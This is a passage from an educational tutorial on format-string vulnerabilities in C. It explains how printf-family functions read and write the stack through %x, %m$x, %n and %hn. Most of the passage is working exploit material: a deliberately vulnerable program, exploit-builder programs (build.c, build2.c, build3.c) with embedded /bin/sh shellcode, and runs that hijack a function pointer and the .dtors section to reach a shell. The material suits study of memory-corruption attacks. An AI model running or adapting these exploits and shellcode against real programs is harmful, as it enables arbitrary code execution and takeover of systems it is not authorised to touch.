  3. last, sizeof buf - 1 bytes2 from this string is copied into the buf destination string, which give us “0123

This is not perfectly exact but reflects the general process. For more details, the reader should refer to the GlibC sources, and particularlyvfprintf() in the ${GLIBC_HOME}/stdio-common directory.

Before ending with this part, let’s add that it is possible to get the same results writing in the format string in a slightly different way. We previously used the format called precision (the dot ‘.’). Another combination of formatting instructions leads to an identical result: 0n, where nis the the number width , and 0 means that the spaces should be replaced with 0 just in case the whole width is not filled up.

Now that you know almost everything about format strings, and most specifically about the %n format, we will study their behaviors.

The stack and printf()

Walking through the stack

The next program will guide us all along this section to understand how printf() and the stack are related:

/* stack.c */
 1: #include <stdio.h>
 2:
 3: int
 4  main(int argc, char **argv)
 5: {
 6:   int i = 1;
 7:   char buffer[64];
 8:   char tmp[] = "\x01\x02\x03";
 9:
10:   snprintf(buffer, sizeof buffer, argv[1]);
11:   buffer[sizeof (buffer) - 1] = 0;
12:   printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
13:   printf ("i = %d (%p)\n", i, &i);
14: }

This program just copies an argument into the buffer character array . We take care not to overflow some important data (format strings are really more accurate than buffer overflows ;-)

>>gcc stack.c -o stack
>>./stack toto
buffer : [toto] (4)
i = 1 (bffff674)

It works as we expected :) Before going further, let’s examine what happens from the stack point of view while calling snprintf() at line 8.

Fig. 1 : the stack at the beginning of snprintf()
snprintf()

Figure 1 describes the state of the stack when the program enters the snprintf() function (we’ll see that it is not true … but this is just to give you an idea of what’s happening). We don’t care about the %esp register. It is somewhere below the %ebp register. As we have seen in a previous article, the first two values located in %ebp and %ebp+4 contain the respective backups of the %ebp and %ebp+4 registers. Next come the arguments of the function snprintf():

  1. the destination address;
  2. the number of characters to be copied;
  3. the address of the format string argv[1] which also acts as data.

Lastly, the stack is topped of with the tmp array of 4 characters , the 64 bytes of the variable buffer and the i integer variable .

The argv[1] string is used at the same time as format string and data. According to the normal order of the snprintf() routine, argv[1] appears instead of the format string. Since you can use a format string without format directives (just text), everything is fine :)

What happens when argv[1] also contains formatting ? ? Normally, snprintf() interprets them as they are … and there is no reason why it should act differently ! But here, you may wonder what arguments are going to be used as data for formatting the resulting output string. In fact,snprintf() grabs data from the stack! You can see that from our stack program:

>>./stack "123 %x"
buffer : [123 30201] (9)
i = 1 (bffff674)

First, the “123 ” string is copied into buffer. The %x asks snprintf() to translate the first value into hexadecimal. From figure 1, this first argument is nothing but the tmp variable which contains the \x01\x02\x03\x00 string. It is displayed as the 0x00030201 hexadecimal number according to our little endian x86 processor.

>>./stack "123 %x %x"
buffer : [123 30201 20333231] (18)
i = 1 (bffff674)

Adding a second %x enables you to go higher in the stack. It tells snprintf() to look for the next 4 bytes after the tmp variable. These 4 bytes are in fact the 4 first bytes of buffer. However, buffer contains the “123 ” string, which can be seen as the 0x20333231 (0x20=space, 0x31=’1’…) hexadecimal number. So, for each %x, snprintf() “jumps” 4 bytes further in buffer (4 because unsigned int takes 4 bytes on x86 processor). This variable acts as double agent by:

  1. writing to the destination;
  2. read input data for the format.

We can “climb up” the stack as long as our buffer contains bytes:

>>./stack "%#010x %#010x %#010x %#010x %#010x %#010x"
buffer : [0x00030201 0x30307830 0x32303330 0x30203130 0x33303378
         0x333837] (63)
i = 1 (bffff654)

Even higher

The previous method allows us to look for important information such as the return address of the function who created the stack holding the buffer. However, it is possible, with the right format, to look for data further than the vulnerable buffer.

You can find an occasionally useful format when it is necessary to swap between the parameters (for instance, while displaying date and time). We add the m$ format, right after the %, where m is an integer >0. It gives the position of the variable to use in the arguments list (starting from 1):

/* explore.c */
#include <stdio.h>

  int
main(int argc, char **argv) {

  char buf[12];

  memset(buf, 0, 12);
  snprintf(buf, 12, argv[1]);

  printf("[%s] (%d)\n", buf, strlen(buf));
}

The format using m$ enables us to go up where we want in the stack, as we could do using gdb:

>>./explore %1\$x
[0] (1)
>>./explore %2\$x
[0] (1)
>>./explore %3\$x
[0] (1)
>>./explore %4\$x
[bffff698] (8)
>>./explore %5\$x
[1429cb] (6)
>>./explore %6\$x
[2] (1)
>>./explore %7\$x
[bffff6c4] (8)

The character \ is necessary here to protect the $ and to prevent the shell from interpreting it. In the first three calls we visit contents of the bufvariable. With %4\$x, we get the %ebp saved register, and then with the next %5\$x, the %eip saved register (a.k.a. the return address). The last 2 results presented here show the argc variable value and the address contained in *argv (remember that **argv means that *argv is an addresses array).

In short …

This example illustrates that the provided formats enable us to go up within the stack in search of information, such as the return value of a function, an address… However, we saw at the beginning of this article that we could write using functions of the printf()‘s type: doesn’t this look like a wonderful potential vulnerability ?

First steps

Let’s go back to the stack program:

>>perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"'
buffer : [döÿ¿000000000000000000000000000000000000000000000000
00000000000] (63)
i = 500 (bffff664)

We give as input string:

  1. the i variable address;
  2. a formatting instruction (%.496x);
  3. a second formatting instruction (%n) which will write into the given address.

To determine the i variable address (0xbffff664 here), we can run the program twice and change the command line accordingly. As you can note it, i has a new value :) The given format string and the stack organization make snprintf() look like :

snprintf(buffer,
         sizeof buffer,
         "\x64\xf6\xff\xbf%.496x%n",
         tmp,
         4 first bytes in buffer);

The first four bytes (containing the i address) are written at the beginning of buffer. The %.496x format allows us to get rid of the tmp variable which is at the beginning of the stack. Then, when the formatting instruction is the %n, the address used is the i‘s one, at the beginning ofbuffer. Although the precision required is 496, snprintf writes only sixty bytes at maximum (because the length of the buffer is 64 and 4 bytes have already been written). The value 496 is arbitrary, and is just used to manipulate the “byte counter”. We have seen that the %n format saves the amount of bytes that should have been written. This value is 496, to which we have to add 4 from the 4 bytes of the i address at the beginning of buffer. Therefore, we have counted 500 bytes. This value will be written into the next address found in the stack, which is the i‘s address.

We can go even further with this example. To change i, we needed to know its address … but sometimes the program itself provides it:

/* swap.c */
#include <stdio.h>

main(int argc, char **argv) {

  int cpt1 = 0;
  int cpt2 = 0;
  int addr_cpt1 = &cpt1;
  int addr_cpt2 = &cpt2;

  printf(argv[1]);
  printf("\ncpt1 = %d\n", cpt1);
  printf("cpt2 = %d\n", cpt2);
}

Running this program shows that we can control the stack (almost) as we want:

>>./swap AAAA
AAAA
cpt1 = 0
cpt2 = 0
>>./swap AAAA%1\$n
AAAA
cpt1 = 0
cpt2 = 4
>>./swap AAAA%2\$n
AAAA
cpt1 = 4
cpt2 = 0

As you can see, depending on the argument, we can change either cpt1, or cpt2. The %n format expects an address, that is why we can’t directly act on the variables, ( i.e. using %3$n (cpt2) or %4$n (cpt1) ) but have to go through pointers. The latter are “fresh meat” with enormous possibilities for modification.

Variations on the same topic

The examples previously presented come from a program compiled with egcs-2.91.66 and glibc-2.1.3-22. However, you probably won’t get the same results on your own box. Indeed, the functions of the *printf() type change according to the glibc and the compilers do not carry out the same operations at all.

The program stuff highlights these differences:

/* stuff.c */
#include <stdio.h>

main(int argc, char **argv) {

  char aaa[] = "AAA";
  char buffer[64];
  char bbb[] = "BBB";

  if (argc < 2) {
    printf("Usage : %s <format>\n",argv[0]);
    exit (-1);
  }

  memset(buffer, 0, sizeof buffer);
  snprintf(buffer, sizeof buffer, argv[1]);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
}

The aaa and bbb arrays are used as delimiters in our journey through the stack. Therefore we know that when we find 424242, the following bytes will be in buffer. Table 1 presents the differences according to the versions of the glibc and compilers.

Tab. 1 : Variations around glibc
Compiler glibc Display
gcc-2.95.3 2.1.3-16 buffer = [8048178 8049618 804828e 133ca0 bffff454 424242 38343038 2038373] (63)
egcs-2.91.66 2.1.3-22 buffer = [424242 32343234 33203234 33343332 20343332 30323333 34333233 33] (63)
gcc-2.96 2.1.92-14 buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)
gcc-2.96 2.2-12 buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)

Next in this article, we will continue to use egcs-2.91.66 and the glibc-2.1.3-22 , but don’t be surprised if you note differences on your machine.

Exploitation of a format bug

While exploiting buffer overflows, we used a buffer to overwrite the return address of a function.

With format strings, we have seen we can go everywhere (stack, heap, bss, .dtors, …), we just have to say where and what to write for %ndoing the job for us.

The vulnerable program

You can exploit a format bug different ways. P. Bouchareine’s article (Format string vulnerability) shows how to overwrite the return address of a function, so we’ll show something else.

/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int helloWorld();
int accessForbidden();

int vuln(const char *format)
{
  char buffer[128];
  int (*ptrf)();

  memset(buffer, 0, sizeof(buffer));

  printf("helloWorld() = %p\n", helloWorld);
  printf("accessForbidden() = %p\n\n", accessForbidden);

  ptrf = helloWorld;
  printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

  snprintf(buffer, sizeof buffer, format);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

  printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

  return ptrf();
}

int main(int argc, char **argv) {
  int i;
  if (argc <= 1) {
    fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
    exit(-1);
  }
  for(i=0;i<argc;i++)
    printf("%d %p\n",i,argv[i]);

  exit(vuln(argv[1]));
}

int helloWorld()
{
  printf("Welcome in \"helloWorld\"\n");
  fflush(stdout);
  return 0;
}

int accessForbidden()
{
  printf("You shouldn't be here \"accesForbidden\"\n");
  fflush(stdout);
  return 0;
}

We define a variable named ptrf which is a pointer to a function. We will change the value of this pointer to run the function we choose.

First example

First, we must get the offset between the beginning of the vulnerable buffer and our current position in the stack:

>>./vuln "AAAA %x %x %x %x"
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [AAAA 21a1cc 8048634 41414141 61313220] (37)
after : ptrf() = 0x8048634 (0xbffff5d4)
Welcome in "helloWorld"

>>./vuln AAAA%3\$x
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5e4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048634 (0xbffff5e4)
Welcome in "helloWorld"

The first call here gives us what we need: 3 words (one word = 4 bytes for x86 processors) separate us from the beginning of the buffervariable. The second call, with AAAA%3\$x as argument, confirms this.

Our goal is now to replace the value of the initial pointer ptrf (0x8048634, the address of the function helloWorld()) with the value 0x8048654 (address of accessForbidden()). We have to write 0x8048654 bytes (134514260 bytes in decimal, something like 128Mbytes). All computers can’t afford such a use of memory … but the one we are using can :) It last around 20 seconds on a dual-pentium 350 MHz:

>>./vuln `printf "\xd4\xf5\xff\xbf%%.134514256x%%"3\$n `
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [Ôõÿ¿000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
0000000000000] (127)
after : ptrf() = 0x8048654 (0xbffff5d4)
You shouldn't be here "accesForbidden"

What did we do? We just provided the address of ptrf (0xbffff5d4). The next format (%.134514256x) reads the first word from the stack, with a precision of 134514256 (we already have written 4 bytes from the address of ptrf, so we still have to write 134514260-4=134514256 bytes). At last, we write the wanted value in the given address (%3$n).

Memory problems: divide and conquer

However, as we mentioned it, it isn’t always possible to use 128MB buffers. The format %n waits for a pointer to an integer, i.e. four bytes. It is possible to alter its behavior to make it point to a short int – only 2 bytes – thanks to the instruction %hn. We thus cut the integer to which we want to write two parts. The largest writable size will then fit in the 0xffff bytes (65535 bytes). Thus in the previous example, we transform the operation writing ” 0x8048654 at the 0xbffff5d4 address” into two successive operations : :

  • writing 0x8654 in the 0xbffff5d4 address
  • writing 0x0804 in the 0xbffff5d4+2=0xbffff5d6 address

The second write operation takes place on the high bytes of the integer, which explains the swap of 2 bytes.

However, %n (or %hn) counts the total number of characters written into the string. This number can only increase. First, we have to write the smallest value between the two. Then, the second formatting will only use the difference between the needed number and the first number written as precision. For instance in our example, the first format operation will be %.2052x (2052 = 0x0804) and the second %.32336x (32336 = 0x8654 – 0x0804). Each %hn placed right after will record the right amount of bytes.

We just have to specify where to write to both %hn. The m$ operator will greatly help us. If we save the addresses at the beginning of the vulnerable buffer, we just have to go up through the stack to find the offset from the beginning of the buffer using the m$ format. Then, both addresses will be at an offset of m and m+1. As we use the first 8 bytes in the buffer to save the addresses to overwrite, the first written value must be decreased by 8.

Our format string looks like:

"[addr][addr+2]%.[val. min. - 8]x%[offset]$hn%.[val. max - val. min.]x%[offset+1]$hn"The build program uses three arguments to create a format string:

  1. the address to overwrite;
  2. the value to write there;
  3. the offset (counted as words) from the beginning of the vulnerable buffer.
/* build.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/**
   The 4 bytes where we have to write are placed that way :
   HH HH LL LL
   The variables ending with "*h" refer to the high part
   of the word (H) The variables ending with "*l" refer
   to the low part of the word (L)
 */
char* build(unsigned int addr, unsigned int value,
      unsigned int where) {

  /* too lazy to evaluate the true length ... :*/
  unsigned int length = 128;
  unsigned int valh;
  unsigned int vall;
  unsigned char b0 = (addr >> 24) & 0xff;
  unsigned char b1 = (addr >> 16) & 0xff;
  unsigned char b2 = (addr >>  8) & 0xff;
  unsigned char b3 = (addr      ) & 0xff;

  char *buf;

  /* detailing the value */
  valh = (value >> 16) & 0xffff; //top
  vall = value & 0xffff;         //bottom

  fprintf(stderr, "adr : %d (%x)\n", addr, addr);
  fprintf(stderr, "val : %d (%x)\n", value, value);
  fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
  fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);

  /* buffer allocation */
  if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
    fprintf(stderr, "Can't allocate buffer (%d)\n", length);
    exit(EXIT_FAILURE);
  }
  memset(buf, 0, length);

  /* let's build */
  if (valh < vall) {

    snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%hdx"            /* set the value for the first %hn */
         "%%%d$hn"            /* the %hn for the high part */

         "%%.%hdx"            /* set the value for the second %hn */
         "%%%d$hn"            /* the %hn for the low part */
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         valh-8,              /* set the value for the first %hn */
         where,               /* the %hn for the high part */

         vall-valh,           /* set the value for the second %hn */
         where+1              /* the %hn for the low part */
         );

  } else {

     snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%hdx"            /* set the value for the first %hn */
         "%%%d$hn"            /* the %hn for the high part */

         "%%.%hdx"            /* set the value for the second %hn */
         "%%%d$hn"            /* the %hn for the low part */
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         vall-8,              /* set the value for the first %hn */
         where+1,             /* the %hn for the high part */

         valh-vall,           /* set the value for the second %hn */
         where                /* the %hn for the low part */
         );
  }
  return buf;
}

int
main(int argc, char **argv) {

  char *buf;

  if (argc < 3)
    return EXIT_FAILURE;
  buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
          strtoul(argv[2], NULL, 16),  /* valeur */
          atoi(argv[3]));              /* offset */

  fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
  printf("%s",  buf);
  return EXIT_SUCCESS;
}

The position of the arguments changes according to whether the first value to be written is in the high or low part of the word. Let’s check what we get now, without any memory troubles.

First, our simple example allows us guessing the offset:

>>./vuln AAAA%3\$x
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5d4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048644 (0xbffff5d4)
Welcome in "helloWorld"

It is always the same : 3. Since our program is done to explain what happens, we already have all the other information we would need : theptrf and accesForbidden() addresses . We build our buffer according to these:

>>./vuln `./build 0xbffff5d4 0x8048664 3`
adr : -1073744428 (bffff5d4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[Öõÿ¿Ôõÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [Öõÿ¿Ôõÿ¿00000000000000000000d000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000
00000000] (127)
after : ptrf() = 0x8048644 (0xbffff5b4)
Welcome in "helloWorld"

Nothing happens! In fact, since we used a longer buffer than in the previous example in the format string, the stack moved. ptrf has gone from0xbffff5d4 to 0xbffff5b4). Our values need to be adjusted:

>>./vuln `./build 0xbffff5b4 0x8048664 3`
adr : -1073744460 (bffff5b4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[¶õÿ¿´õÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [¶õÿ¿´õÿ¿0000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x8048664 (0xbffff5b4)
You shouldn't be here "accesForbidden"

We won!!!

Other exploits

In this article, we started by proving that the format bugs are a real vulnerability. Another important concern is how to exploit them. Buffer overflow exploits rely on writing to the return address of a function. Then, you have to try (almost) at random and pray a lot for your scripts to find the right values (even the eggshell must be full of NOP). You don’t need all this with format bugs and you are no more restricted to the return address overwriting.

We have seen that format bugs allow us to write anywhere. So, we will see now an exploitation based on the .dtors section.

When a program is compiled with gcc, you can find a constructor section (named .ctors) and a destructor (named .dtors). Each of these sections contains pointers to functions to be carried out before entering the main() function and after exiting, respectively.

/* cdtors */

void start(void) __attribute__ ((constructor));
void end(void) __attribute__ ((destructor));

int main() {
  printf("in main()\n");
}

void start(void) {
  printf("in start()\n");
}

void end(void) {
  printf("in end()\n");
}

Our small program shows that mechanism:

>>gcc cdtors.c -o cdtors
>>./cdtors
in start()
in main()
in end()

Each one of these sections is built in the same way:

>>objdump -s -j .ctors cdtors

cdtors:     file format elf32-i386

Contents of section .ctors:
 804949c ffffffff dc830408 00000000           ............
>>objdump -s -j .dtors cdtors

cdtors:     file format elf32-i386

Contents of section .dtors:
 80494a8 ffffffff f0830408 00000000           ............

We check that the indicated addresses match those of our functions (attention : the preceding objdump command gives the addresses in little endian):

>>objdump -t cdtors | egrep "start|end"
080483dc g     F .text  00000012              start
080483f0 g     F .text  00000012              end

So, these sections contain the addresses of the functions to run at the beginning (or the end), framed with 0xffffffff and 0x00000000.

Let us apply this to vuln by using the format string. First, we have to get the location in memory of these sections, which is really easy when you have the binary at hand ;-) Simply use the objdump like we did previously:

>> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049844 ffffffff 00000000                    ........

Here it is ! We have everything we need now.

The goal of the exploitation is to replace the address of a function in one of these sections with the one of the functions we want to execute. If those sections are empty, we just have to overwrite the 0x00000000 which indicates the end of the section. This will cause a segmentation faultbecause the program won’t find this 0x00000000, it will take the next value as the address of a function, which is probably not true.

In fact, the only interesting section is the destructor section (.dtors): we have no time to do anything before the constructor section (.ctors). Usually, it is enough to overwrite the address placed 4 bytes after the start of the section (the 0xffffffff):

  • if there is no address there, we overwrite the 0x00000000;
  • otherwise, the first function to be executed will be ours.

Let’s go back to our example. We replace the 0x00000000 in section .dtors, placed in 0x8049848=0x8049844+4, with the address of theaccesForbidden() function, already known (0x8048664):

>./vuln `./build 0x8049848 0x8048664 3`
adr : 134518856 (8049848)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[JH%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = bffff694 (0xbffff51c)
helloWorld() = 0x8048648
accessForbidden() = 0x8048664

before : ptrf() = 0x8048648 (0xbffff434)
buffer = [JH0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
000] (127)
after : ptrf() = 0x8048648 (0xbffff434)
Welcome in "helloWorld"
You shouldn't be here "accesForbidden"
Segmentation fault (core dumped)

Everything runs fine, the main() helloWorld() and then exit. The destructor is then called. The section .dtors starts with the address ofaccesForbidden(). Then, since there is no other real function address, the expected coredump happens.

Please, give me a shell

We have seen simple exploits here. Using the same principle we can get a shell, either by passing the shellcode through argv[] or an environment variable to the vulnerable program. We just have to set the right address (i.e. the address of the eggshell) in the section .dtors.

Right now, we know:

  • how to explore the stack within reasonable limits (in fact, theoretically, there is no limit, but it gets rather painful rather quickly to recover the words on the stack one by one);
  • how to write the expected value to the right address.

However, in reality, the vulnerable program is not as nice as the one in the example. We will introduce a method that allows us to put a shellcode in memory and retrieve its exact address (this means: no more NOP at the beginning of the shellcode).

The idea is based on recursive calls of the function exec*():

/* argv.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


main(int argc, char **argv) {

  char **env;
  char **arg;
  int nb = atoi(argv[1]), i;

  env    = (char **) malloc(sizeof(char *));
  env[0] = 0;

  arg    = (char **) malloc(sizeof(char *) * nb);
  arg[0] = argv[0];
  arg[1] = (char *) malloc(5);
  snprintf(arg[1], 5, "%d", nb-1);
  arg[2] = 0;

  /* printings */
  printf("*** argv %d ***\n", nb);
  printf("argv = %p\n", argv);
  printf("arg = %p\n", arg);
  for (i = 0; i<argc; i++) {
    printf("argv[%d] = %p (%p)\n", i, argv[i], &argv[i]);
    printf("arg[%d] = %p (%p)\n", i, arg[i], &arg[i]);
  }
  printf("\n");

  /* recall */
  if (nb == 0)
    exit(0);
  execve(argv[0], arg, env);
}

The input is an nb integer that the program will recursively calle itself nb+1 times:

>>./argv 2
*** argv 2 ***
argv = 0xbffff6b4
arg = 0x8049828
argv[0] = 0xbffff80b (0xbffff6b4)
arg[0] = 0xbffff80b (0x8049828)
argv[1] = 0xbffff812 (0xbffff6b8)
arg[1] = 0x8049838 (0x804982c)

*** argv 1 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

*** argv 0 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

We immediately notice the allocated addresses for arg and argv don’t move anymore after the second call. We are going to use this property in our exploit. We just have to change our build program slightly to make it call itself before calling vuln. So, we get the exact argv address, and the one of our shellcode.:

/* build2.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Same function as in build.c
}

int
main(int argc, char **argv) {

  char *buf;
  char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
     "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  if(argc < 3)
    return EXIT_FAILURE;

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
        &shellcode,
        atoi(argv[2]));              /* offset */

    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    execlp(argv[0], argv[0], buf, &shellcode, argv[1], argv[2], NULL);

  } else {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", argv[2]);
    buf = build(strtoul(argv[3], NULL, 16),  /* adresse */
        argv[2],
        atoi(argv[4]));              /* offset */

    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));

    execlp("./vuln","./vuln", buf, argv[2], argv[3], argv[4], NULL);
  }

  return EXIT_SUCCESS;
}

The trick is that we know what to call according to the number of arguments the program received. To start our exploit, we just give to build2the address we want to write to and the offset. We don’t have to give the value anymore since it is going to be evaluated by our successive calls.

To succeed, we need to keep the same memory layout between the different calls of build2 and then vuln (that is why we call the build() function, in order to use the same memory footprint):

>>./build2 0xbffff634 3
Calling ./build2 ...
adr : -1073744332 (bffff634)
val : -1073744172 (bffff6d4)
valh: 49151 (bfff)
vall: 63188 (f6d4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14037x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff88f
adr : -1073744332 (bffff634)
val : -1073743729 (bffff88f)
valh: 49151 (bfff)
vall: 63631 (f88f)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14480x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000
00000000000] (127)
after : ptrf() = 0xbffff88f (0xbffff634)
Segmentation fault (core dumped)

Why didn’t this work ? We said we had to build the exact copy of the memory between the 2 calls … and we didn’t do it ! argv[0] (the name of the program) changed. Our program is first named build2 (6 bytes) and vuln after (4 bytes). There is a difference of 2 bytes, which is exactly the value that you can notice in the example above. The address of the shellcode during the second call of build2 is given by sc=0xbffff88f but the content of argv[2] in vuln gives 20xbffff891: our 2 bytes. To solve this, it is enough to rename our build2 to only 4 letters e.g bui2:

>>cp build2 bui2
>>./bui2 0xbffff634 3
Calling ./bui2 ...
adr : -1073744332 (bffff634)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff891
adr : -1073744332 (bffff634)
val : -1073743727 (bffff891)
valh: 49151 (bfff)
vall: 63633 (f891)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14482x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
000000000000000] (127)
after : ptrf() = 0xbffff891 (0xbffff634)
bash$

Won again : that works much better that way ;-) The eggshell is in the stack and we changed the address pointed to by ptrf to have it point to our shellcode. Of course, it can happen only if the stack is executable.

But we have seen that format strings allow us to write anywhere : let’s add a destructor to our program in the section .dtors:

>>objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
80498c0 ffffffff 00000000                    ........
>>./bui2 80498c4 3
Calling ./bui2 ...
adr : 134518980 (80498c4)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[ÆÄ%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff894
adr : 134518980 (80498c4)
val : -1073743724 (bffff894)
valh: 49151 (bfff)
vall: 63636 (f894)
[ÆÄ%.49143x%3$hn%.14485x%4$hn] (34)
0 0xbffff86a
1 0xbffff871
2 0xbffff894
3 0xbffff8c2
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [ÆÄ000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x80486c4 (0xbffff634)
Welcome in "helloWorld"
bash$ exit
exit
>>

Here, no coredump is created while quitting our destructor. This is because our shellcode contains an exit(0) call.

In conclusion as a last gift, here is build3.c that also gives a shell, but passed through an environment variable:

/* build3.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Même fonction que dans build.c
}

int main(int argc, char **argv) {
  char **env;
  char **arg;
  unsigned char *buf;
  unsigned char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
        &shellcode,
        atoi(argv[2]));              /* offset */

    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    env = (char **) malloc(sizeof(char *) * 4);
    env[0]=&shellcode;
    env[1]=argv[1];
    env[2]=argv[2];
    env[3]=NULL;
    execve(argv[0],arg,env);
  } else
  if(argc==2) {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", environ[0]);
    buf = build(strtoul(environ[1], NULL, 16),  /* adresse */
        environ[0],
        atoi(environ[2]));              /* offset */

    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    execve("./vuln",arg,environ);
  }

  return 0;
}

Once again, since this environment is in the stack, we need to take care not to modify the memory (i.e. changing the position of the variables and arguments). The binary’s name must contain the same number of characters as the name of vulnerable program vuln.

Here, we choose to use the global variable extern char **environ to set the values we need:

  1. environ[0]: contains shellcode;
  2. environ[1]: contains the address where we expect to write;
  3. environ[2]: contains the offset.

We leave you , play with it … this (too) long article is already filled with too much source code and test programs.

Conclusion : how to avoid format bugs ?

